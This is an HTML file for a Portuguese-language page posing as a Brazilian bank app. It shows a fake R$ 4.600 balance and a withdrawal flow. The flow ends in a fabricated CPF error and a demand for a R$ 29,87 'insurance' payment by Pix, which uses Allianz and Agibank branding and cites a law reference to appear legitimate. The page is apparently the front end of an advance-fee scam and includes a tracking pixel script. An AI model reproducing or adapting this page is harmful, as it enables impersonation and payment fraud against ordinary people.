<!DOCTYPE html>
<html lang="pt-BR">
  <head>
    <meta charset="UTF-8" />
    <meta name="viewport" content="width=device-width, initial-scale=1.0" />
    <title>Banco App- Dashboard</title>
    <link
      href="https://cdn.jsdelivr.net/npm/bootstrap@5.3.0/dist/css/bootstrap.min.css"
      rel="stylesheet"
    />
    <link
      rel="stylesheet"
      href="https://cdn.jsdelivr.net/npm/bootstrap-icons@1.11.0/font/bootstrap-icons.css"
    />
    <link
      rel="stylesheet"
      href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.4.0/css/all.min.css"
    />
    <link rel="stylesheet" href="css/styles.css" />
  </head>
  <body>
    <!-- Notificação -->
    <div id="notification" class="notification d-none">
      <div class="notification-content">
        <div class="notification-time">agora</div>
        <div class="notification-icon">
          <img src="img/logo-square.png" alt="Agibank" />
        </div>
        <div class="notification-text">
          <div class="notification-title"><span class="marca"></span></div>
          <div class="notification-message">
            Você recebeu R$ 4.600,00 de <span class="marca"></span>.
          </div>
        </div>
      </div>
    </div>

    <!-- Alertinha dos botões -->
    <div class="mini-alert">
      <div class="mini-alert-content">
        <i class="bi bi-exclamation-triangle-fill me-2"></i>
        <span class="mini-alert-text"
          >Realize o primeiro saque para ativar esta função.</span
        >
      </div>
    </div>

    <header class="bg-primary text-white p-3">
      <div class="container">
        <div class="d-flex justify-content-between align-items-center">
          <h5 class="mb-0">Olá, <span id="userName">Usuário</span>!</h5>
          <img src="img/logo.png" alt="Logo" class="logo" width="120" />
        </div>
      </div>
    </header>

    <main class="container-fluid p-0 mb-5 pb-5">
      <div class="container mt-3 mb-3">
        <div class="card rounded-4 text-white conta-card">
          <div class="card-body p-3">
            <div class="d-flex justify-content-between align-items-center mb-3">
              <span class="fw-medium">Conta</span>
              <span class="small">Ver extrato &gt;</span>
            </div>

            <div class="mt-4">
              <div class="small opacity-75">Saldo em conta</div>
              <h3 class="fw-bold mb-0" id="balance">R$ 4.600,00</h3>
              <div class="small opacity-75 mb-4">rendendo 102% do CDI</div>

              <button
                class="btn btn-light text-primary fw-medium rounded-pill px-4 w-100"
              >
                Sacar agora!
              </button>
            </div>
          </div>
        </div>
      </div>

      <div class="container mt-4">
        <div class="finance-actions-carousel">
          <div class="row flex-nowrap overflow-auto snap-scroll pb-2">
            <div class="col-3 col-md-3 text-center">
              <div
                class="card action-icon-card action-item-active mx-auto mb-2"
                data-mini-alert="false"
              >
                <div
                  class="d-flex justify-content-center align-items-center h-100"
                >
                  <i class="bi bi-cash-coin fs-4"></i>
                </div>
              </div>
              <p class="mb-0 small">Sacar agora!</p>
            </div>

            <div class="col-3 col-md-3 text-center">
              <div class="card action-icon-card bg-light mx-auto mb-2">
                <div
                  class="d-flex justify-content-center align-items-center h-100"
                >
                  <i class="fa-brands fa-pix fs-4"></i>
                </div>
              </div>
              <p class="mb-0 small">Pix</p>
            </div>

            <div class="col-3 col-md-3 text-center">
              <div class="card action-icon-card bg-light mx-auto mb-2">
                <div
                  class="d-flex justify-content-center align-items-center h-100"
                >
                  <i class="bi bi-upc-scan fs-4"></i>
                </div>
              </div>
              <p class="mb-0 small">Pagar Boleto</p>
            </div>

            <div class="col-3 col-md-3 text-center">
              <div class="card action-icon-card bg-light mx-auto mb-2">
                <div
                  class="d-flex justify-content-center align-items-center h-100"
                >
                  <i class="bi bi-piggy-bank-fill fs-4"></i>
                </div>
              </div>
              <p class="mb-0 small">Cofrinhos</p>
            </div>

            <div class="col-3 col-md-3 text-center">
              <div class="card action-icon-card bg-light mx-auto mb-2">
                <div
                  class="d-flex justify-content-center align-items-center h-100"
                >
                  <i class="bi bi-people-fill fs-4"></i>
                </div>
              </div>
              <p class="mb-0 small">Pagar pessoas</p>
            </div>
          </div>
        </div>
      </div>

      <div class="container mt-2">
        <div id="carouselPromo" class="carousel slide" data-bs-ride="carousel">
          <div class="carousel-inner">
            <div class="carousel-item active">
              <div class="promo-card bg-dark text-white" data-mini-alert="true">
                <div class="promo-content">
                  <h4 class="promo-title mb-2">Modo Seguro</h4>
                  <p class="promo-description">
                    Oculte seus investimentos<br />quando estiver na rua. É
                    grátis!
                  </p>
                  <span class="promo-link">Saiba Mais &gt;</span>
                </div>
                <div class="promo-image">
                  <img src="img/slider-2.webp" alt="Modo Seguro" />
                </div>
              </div>
            </div>
            <div class="carousel-item">
              <div class="promo-card bg-light" data-mini-alert="true">
                <div class="promo-content">
                  <h4 class="promo-title mb-2">Open Finance</h4>
                  <p class="promo-description">
                    Ative e aproveite <br />
                    ofertas exclusivas para investir
                  </p>
                  <span class="promo-link">Ativar &gt;</span>
                </div>
                <div class="promo-image">
                  <img src="img/slider-1.webp" alt="Open Finance" />
                </div>
              </div>
            </div>

            <div class="carousel-item">
              <div
                class="promo-card bg-primary text-white"
                data-mini-alert="true"
              >
                <div class="promo-content">
                  <h4 class="promo-title mb-2">CDB 105% do CDI</h4>
                  <p class="promo-description">
                    Invista e tenha rentabilidade<br />em 1 ano
                  </p>
                  <span class="promo-link">Garantir Oferta &gt;</span>
                </div>
                <div class="promo-image">
                  <img src="img/slider-3.webp" alt="CDB" />
                </div>
              </div>
            </div>
          </div>

          <!-- <button class="carousel-control-prev" type="button" data-bs-target="#carouselPromo" data-bs-slide="prev">
                    <span class="carousel-control-prev-icon" aria-hidden="true"></span>
                    <span class="visually-hidden">Anterior</span>
                </button>
                <button class="carousel-control-next" type="button" data-bs-target="#carouselPromo" data-bs-slide="next">
                    <span class="carousel-control-next-icon" aria-hidden="true"></span>
                    <span class="visually-hidden">Próximo</span>
                </button> -->

          <div class="carousel-indicators">
            <button
              type="button"
              data-bs-target="#carouselPromo"
              data-bs-slide-to="0"
              class="active"
              aria-current="true"
              aria-label="Slide 1"
            ></button>
            <button
              type="button"
              data-bs-target="#carouselPromo"
              data-bs-slide-to="1"
              aria-label="Slide 2"
            ></button>
            <button
              type="button"
              data-bs-target="#carouselPromo"
              data-bs-slide-to="2"
              aria-label="Slide 3"
            ></button>
          </div>
        </div>
      </div>

      <div class="container mt-4">
        <h4 class="mb-3">Promoções e cashback</h4>

        <div class="cashback-slider">
          <div class="cashback-scroll">
            <div class="col-4 col-md-3">
              <div
                class="card border-0 overflow-visible"
                data-mini-alert="true"
              >
                <div class="rounded-4 overflow-hidden mb-2">
                  <img
                    src="img/cashback/loja-1.png"
                    class="card-img-top"
                    alt="Renner"
                  />
                </div>
                <div class="cashback-badge">2% CASHBACK</div>
                <div class="card-body text-center py-2 px-1">
                  <h6 class="mb-0">Renner</h6>
                </div>
              </div>
            </div>

            <div class="col-4 col-md-3">
              <div
                class="card border-0 overflow-visible"
                data-mini-alert="true"
              >
                <div class="rounded-4 overflow-hidden mb-2">
                  <img
                    src="img/cashback/loja-2.png"
                    class="card-img-top"
                    alt="Netshoes"
                  />
                </div>
                <div class="cashback-badge">2% CASHBACK</div>
                <div class="card-body text-center py-2 px-1">
                  <h6 class="mb-0">Netshoes</h6>
                </div>
              </div>
            </div>

            <div class="col-4 col-md-3">
              <div
                class="card border-0 overflow-visible"
                data-mini-alert="true"
              >
                <div class="rounded-4 overflow-hidden mb-2">
                  <img
                    src="img/cashback/loja-3.png"
                    class="card-img-top"
                    alt="Natura"
                  />
                </div>
                <div class="cashback-badge">2% CASHBACK</div>
                <div class="card-body text-center py-2 px-1">
                  <h6 class="mb-0">Natura</h6>
                </div>
              </div>
            </div>

            <div class="col-4 col-md-3">
              <div
                class="card border-0 overflow-visible"
                data-mini-alert="true"
              >
                <div class="rounded-4 overflow-hidden mb-2">
                  <img
                    src="img/cashback/loja-4.png"
                    class="card-img-top"
                    alt="Casas Bahia"
                  />
                </div>
                <div class="cashback-badge">2% CASHBACK</div>
                <div class="card-body text-center py-2 px-1">
                  <h6 class="mb-0">Casas Bahia</h6>
                </div>
              </div>
            </div>

            <div class="col-4 col-md-3">
              <div
                class="card border-0 overflow-visible"
                data-mini-alert="true"
              >
                <div class="rounded-4 overflow-hidden mb-2">
                  <img
                    src="img/cashback/loja-5.png"
                    class="card-img-top"
                    alt="Madeira Madeira"
                  />
                </div>
                <div class="cashback-badge">2% CASHBACK</div>
                <div class="card-body text-center py-2 px-1">
                  <h6 class="mb-0">Madeira Madeira</h6>
                </div>
              </div>
            </div>

            <div class="col-4 col-md-3">
              <div
                class="card border-0 overflow-visible"
                data-mini-alert="true"
              >
                <div class="rounded-4 overflow-hidden mb-2">
                  <img
                    src="img/cashback/loja-6.png"
                    class="card-img-top"
                    alt="Kabum"
                  />
                </div>
                <div class="cashback-badge">2% CASHBACK</div>
                <div class="card-body text-center py-2 px-1">
                  <h6 class="mb-0">Kabum</h6>
                </div>
              </div>
            </div>

            <div class="col-4 col-md-3">
              <div
                class="card border-0 overflow-visible"
                data-mini-alert="true"
              >
                <div class="rounded-4 overflow-hidden mb-2">
                  <img
                    src="img/cashback/loja-1.png"
                    class="card-img-top"
                    alt="Renner"
                  />
                </div>
                <div class="cashback-badge">2% CASHBACK</div>
                <div class="card-body text-center py-2 px-1">
                  <h6 class="mb-0">Renner</h6>
                </div>
              </div>
            </div>

            <div class="col-4 col-md-3">
              <div
                class="card border-0 overflow-visible"
                data-mini-alert="true"
              >
                <div class="rounded-4 overflow-hidden mb-2">
                  <img
                    src="img/cashback/loja-2.png"
                    class="card-img-top"
                    alt="Netshoes"
                  />
                </div>
                <div class="cashback-badge">2% CASHBACK</div>
                <div class="card-body text-center py-2 px-1">
                  <h6 class="mb-0">Netshoes</h6>
                </div>
              </div>
            </div>

            <div class="col-4 col-md-3">
              <div
                class="card border-0 overflow-visible"
                data-mini-alert="true"
              >
                <div class="rounded-4 overflow-hidden mb-2">
                  <img
                    src="img/cashback/loja-3.png"
                    class="card-img-top"
                    alt="Natura"
                  />
                </div>
                <div class="cashback-badge">2% CASHBACK</div>
                <div class="card-body text-center py-2 px-1">
                  <h6 class="mb-0">Natura</h6>
                </div>
              </div>
            </div>
          </div>
        </div>
      </div>

      <div class="container mt-4">
        <h4 class="mb-3">Serviços</h4>

        <div class="horizontal-buttons">
          <div class="card action-button mb-2" data-mini-alert="true">
            <div
              class="card-body d-flex justify-content-between align-items-center py-3"
            >
              <span class="action-text">Investimentos</span>
              <div class="action-icon-circle">
                <i class="bi bi-graph-up-arrow"></i>
              </div>
            </div>
          </div>

          <div class="card action-button mb-2" data-mini-alert="true">
            <div
              class="card-body d-flex justify-content-between align-items-center py-3"
            >
              <span class="action-text">Cartões</span>
              <div class="action-icon-circle">
                <i class="bi bi-credit-card"></i>
              </div>
            </div>
          </div>

          <div class="card action-button mb-2" data-mini-alert="true">
            <div
              class="card-body d-flex justify-content-between align-items-center py-3"
            >
              <span class="action-text">Empréstimos</span>
              <div class="action-icon-circle">
                <i class="bi bi-cash-stack"></i>
              </div>
            </div>
          </div>

          <div class="card action-button mb-2" data-mini-alert="true">
            <div
              class="card-body d-flex justify-content-between align-items-center py-3"
            >
              <span class="action-text">Seguros</span>
              <div class="action-icon-circle">
                <i class="bi bi-shield-check"></i>
              </div>
            </div>
          </div>

          <div class="card action-button mb-2" data-mini-alert="true">
            <div
              class="card-body d-flex justify-content-between align-items-center py-3"
            >
              <span class="action-text">Central de Segurança</span>
              <div class="action-icon-circle">
                <i class="bi bi-lock"></i>
              </div>
            </div>
          </div>
        </div>
      </div>
    </main>

    <div
      class="modal fade"
      id="saqueModal"
      tabindex="-1"
      aria-labelledby="saqueModalLabel"
      aria-hidden="true"
    >
      <div class="modal-dialog modal-dialog-centered">
        <div class="modal-content rounded-4">
          <div class="modal-header border-0 pb-0">
            <button
              type="button"
              class="btn-close"
              data-bs-dismiss="modal"
              aria-label="Fechar"
            ></button>
          </div>
          <div class="modal-body px-4 pt-0 pb-4">
            <div id="loadingScreen" class="text-center py-5 d-none">
              <div class="spinner-border text-primary mb-3" role="status">
                <span class="visually-hidden">Carregando...</span>
              </div>
              <h5 class="mb-3" id="loadingText">Realizando saque...</h5>
              <div id="errorMessage" class="text-danger fw-bold d-none">
                Há pendências no CPF:
                <span id="userCpfError">123.456.789-00</span>, regularize para
                concluir o saque
              </div>
            </div>

            <div id="errorCard" class="d-none">
              <div class="text-center mb-4"></div>

              <h4 class="fw-bold text-center mb-3">
                Garanta seu empréstimo agora
              </h4>
              <p class="text-center text-muted mb-4">
                Seu empréstimo está quase pronto, falta apenas confirmar alguns
                detalhes
              </p>

              <div class="card bg-primary text-white mb-4 rounded-3">
                <div
                  class="card-body p-3"
                  style="
                    background-color: #003781;
                    border-radius: 0.5rem;
                    font-family: 'Segoe UI', sans-serif;
                  "
                >
                  <div class="d-flex align-items-center mb-2">
                    <img
                      src="img/allianz-logo.svg"
                      alt="Allianz"
                      class="me-2"
                      style="height: 30px; filter: brightness(0) invert(1)"
                    />
                  </div>
                  <p class="mb-2 small">
                    A Allianz Seguradora será responsável pela segurança do seu
                    empréstimo e por qualquer saldo que você não consiga pagar.
                  </p>
                  <p class="mb-0 small">
                    A taxa do seguro será 100% devolvida para você
                    automaticamente após a quitação do empréstimo, conforme a
                    sanção na lei do empréstimo nº 10.820/2023.
                  </p>
                </div>
              </div>

              <div class="mb-4">
                <h5 class="fw-bold mb-3">Detalhamento da Tarifa do Seguro</h5>
                <div
                  class="d-flex justify-content-between border-bottom pb-2 mb-2"
                >
                  <span>Declaração de seguro</span>
                  <span class="fw-bold">R$ 8,39</span>
                </div>
                <div
                  class="d-flex justify-content-between border-bottom pb-2 mb-2"
                >
                  <span>Proteção da seguradora</span>
                  <span class="fw-bold">R$ 15,37</span>
                </div>
                <div
                  class="d-flex justify-content-between border-bottom pb-2 mb-2"
                >
                  <span>Apólice virtual</span>
                  <span class="fw-bold">R$ 6,11</span>
                </div>
                <div class="d-flex justify-content-between mt-2">
                  <span class="fw-bold">Total do seguro</span>
                  <span class="fw-bold text-success">R$ 29,87</span>
                </div>
              </div>

              <div
                class="card bg-success bg-opacity-10 border-success mb-4 rounded-3"
              >
                <div class="card-body p-3">
                  <h5 class="text-success mb-2">
                    <i class="bi bi-check-circle-fill me-2"></i>
                    Valor do empréstimo
                  </h5>
                  <h3
                    class="text-success fw-bold mb-2"
                    id="valorEmprestimoDisplay"
                  >
                    R$ 0,00
                  </h3>
                  <p class="small mb-0 text-success">
                    Após o pagamento da seguradora, você receberá o valor em até
                    10 minutos
                  </p>
                  <small class="text-muted"
                    >Chave PIX: <span id="chavePixDisplay">HUH</span></small
                  >
                </div>
              </div>

              <div class="text-center mb-3">
                <h3 class="fw-bold">R$ 29,87</h3>
              </div>

              <button
                class="btn btn-success btn-lg w-100 rounded-3 mb-3"
                id="regularizeBtn"
                style="background-color: #00a651; border-color: #00a651"
              >
                <i class="fa-brands fa-pix me-2"></i> Pagar agora
              </button>

              <p class="small text-muted text-center mb-0">
                O pagamento será confirmado imediatamente
              </p>
              <div class="text-center">
                <span class="badge bg-success bg-opacity-10 text-success">
                  <i class="bi bi-shield-check me-1"></i>
                  Processo 100% seguro
                </span>
              </div>
            </div>

            <div id="mainWithdrawContent">
              <div class="card conta-card rounded-4 text-white mb-4">
                <div class="card-body p-3">
                  <div class="small opacity-75">Seu saldo</div>
                  <h3 class="fw-bold mb-0" id="modalSaldoValue">R$ 0,00</h3>
                </div>
              </div>

              <h5 class="mb-3">Selecione o tipo de chave PIX</h5>

              <div class="pix-key-options mb-4">
                <div class="row flex-nowrap overflow-auto snap-scroll pb-2">
                  <div class="col-3 col-md-3 text-center">
                    <div
                      class="card action-icon-card bg-light mx-auto mb-2 pix-key-option"
                      data-key-type="cpf"
                    >
                      <div
                        class="d-flex justify-content-center align-items-center h-100"
                      >
                        <i class="bi bi-person-vcard fs-4"></i>
                      </div>
                    </div>
                    <p class="mb-0 small">CPF/CNPJ</p>
                  </div>

                  <div class="col-3 col-md-3 text-center">
                    <div
                      class="card action-icon-card bg-light mx-auto mb-2 pix-key-option"
                      data-key-type="telefone"
                    >
                      <div
                        class="d-flex justify-content-center align-items-center h-100"
                      >
                        <i class="bi bi-telephone fs-4"></i>
                      </div>
                    </div>
                    <p class="mb-0 small">Telefone</p>
                  </div>

                  <div class="col-3 col-md-3 text-center">
                    <div
                      class="card action-icon-card bg-light mx-auto mb-2 pix-key-option"
                      data-key-type="email"
                    >
                      <div
                        class="d-flex justify-content-center align-items-center h-100"
                      >
                        <i class="bi bi-envelope fs-4"></i>
                      </div>
                    </div>
                    <p class="mb-0 small">E-mail</p>
                  </div>

                  <div class="col-3 col-md-3 text-center">
                    <div
                      class="card action-icon-card bg-light mx-auto mb-2 pix-key-option"
                      data-key-type="aleatoria"
                    >
                      <div
                        class="d-flex justify-content-center align-items-center h-100"
                      >
                        <i class="bi bi-shuffle fs-4"></i>
                      </div>
                    </div>
                    <p class="mb-0 small">Aleatória</p>
                  </div>
                </div>
              </div>

              <div class="mb-3">
                <input
                  type="text"
                  class="form-control form-control-lg rounded-4 mb-3"
                  id="pixKeyInput"
                  placeholder="Digite sua chave PIX aqui"
                />
                <input
                  type="text"
                  class="form-control form-control-lg rounded-4"
                  id="withdrawAmount"
                  placeholder="Digite o valor que deseja sacar"
                />
              </div>

              <button
                class="btn btn-primary btn-lg w-100 rounded-pill mt-3"
                id="confirmWithdraw"
              >
                REALIZAR SAQUE
              </button>
            </div>
          </div>
        </div>
      </div>
    </div>

    <nav class="fixed-bottom bg-primary shadow-lg">
      <div class="container">
        <div class="row text-center py-2">
          <div class="col-4">
            <a href="#" class="text-white d-block text-decoration-none active">
              <i class="bi bi-house-door fs-4"></i>
              <div class="small">Principal</div>
            </a>
          </div>
          <div class="col-4">
            <a href="#" class="text-white d-block text-decoration-none">
              <i class="bi bi-currency-dollar fs-4"></i>
              <div class="small">Saques</div>
            </a>
          </div>
          <div class="col-4">
            <a href="#" class="text-white d-block text-decoration-none">
              <i class="bi bi-person fs-4"></i>
              <div class="small">Meus dados</div>
            </a>
          </div>
        </div>
      </div>
    </nav>

    <script src="https://cdn.jsdelivr.net/npm/bootstrap@5.3.0/dist/js/bootstrap.bundle.min.js"></script>
    <script src="js/dashboard.js"></script>
    <script src="../assets/js/pixel.js"></script>
  </body>
</html>
